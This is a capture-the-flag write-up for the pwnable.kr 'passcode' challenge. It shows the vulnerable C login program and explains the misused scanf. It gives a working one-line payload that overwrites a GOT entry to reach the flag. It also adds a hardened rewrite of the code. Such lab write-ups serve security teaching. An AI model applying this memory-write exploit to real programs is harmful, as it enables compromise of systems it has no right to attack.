Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?
ssh passcode@pwnable.kr -p2222 (pw:guest)
I listed the files.
```
passcode@pwnable:~$ ls
flag  passcode  passcode.c
```
The contents of passcode.c are as follows.
```
passcode@pwnable:~$ cat passcode.c
#include <stdio.h>
#include <stdlib.h>

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
    scanf("%d", passcode2);

    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
        printf("Login OK!\n");
        system("/bin/cat flag");
    }
    else{
        printf("Login Failed!\n");
        exit(0);
    }
}

void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");

    welcome();
    login();

    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;
}
```
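On lines 10 and 15 of the listing, the & is missing, so the input is not stored in passcode1 or passcode2; it is written to the memory location whose address is the current value of passcode1 or passcode2.
The conversion specifier in scanf("%d", passcode1) is %d, so the value has to be supplied as a decimal integer.
0x080485e3 is 134514147 in decimal.
Entering the input below yields the flag.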
```
passcode@pwnable:~$ python -c "print('A' * 96 + '\x04\xa0\x04\x08' + '134514147')" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
Sorry mom.. I got confused about scanf usage :(
enter passcode1 : Now I can safely trust you that you have credential :)
```
Flag? : Sorry mom.. I got confused about scanf usage :(
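A hardened counterpart to the login code above, added here as an example; it is not part of the original write-up or of the challenge. The helper names parse_passcode, read_name and login_ok are hypothetical; the sketch passes the address of each int, validates the whole input line, and bounds the name to 99 characters plus the terminator.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

#define NAME_LEN 100

/* Vulnerable form in passcode.c:  scanf("%d", passcode1);  (int used as address)
 * Building with -Wall -Werror=format rejects that call at compile time. */

/* Parse one line as a decimal int: 1 on success, 0 on bad input. */
static int parse_passcode(const char *line, int *out)
{
    char *end;
    long v;
    errno = 0;
    v = strtol(line, &end, 10);
    if (end == line || errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return 0;                      /* no digits, or out of int range */
    while (*end == ' ' || *end == '\n' || *end == '\r')
        end++;                         /* tolerate trailing whitespace */
    if (*end != '\0')
        return 0;                      /* trailing garbage such as "12x" */
    *out = (int)v;                     /* store into the caller's object */
    return 1;
}

/* "%100s" into name[100] lets scanf write a 101st byte (the NUL); use 99. */
static int read_name(const char *line, char name[NAME_LEN])
{
    return sscanf(line, "%99s", name) == 1;
}

/* Passcodes start at 0, so a failed parse never leaves stale stack data. */
static int login_ok(const char *line1, const char *line2)
{
    int passcode1 = 0, passcode2 = 0;
    if (!parse_passcode(line1, &passcode1) || !parse_passcode(line2, &passcode2))
        return 0;
    return passcode1 == 338150 && passcode2 == 13371337; /* values from passcode.c */
}

int main(void)
{
    char name[NAME_LEN], l0[256], l1[32], l2[32];
    if (!fgets(l0, sizeof l0, stdin) || !read_name(l0, name)) return 1;
    if (!fgets(l1, sizeof l1, stdin) || !fgets(l2, sizeof l2, stdin)) return 1;
    puts(login_ok(l1, l2) ? "Login OK!" : "Login Failed!");
    return 0;
}
```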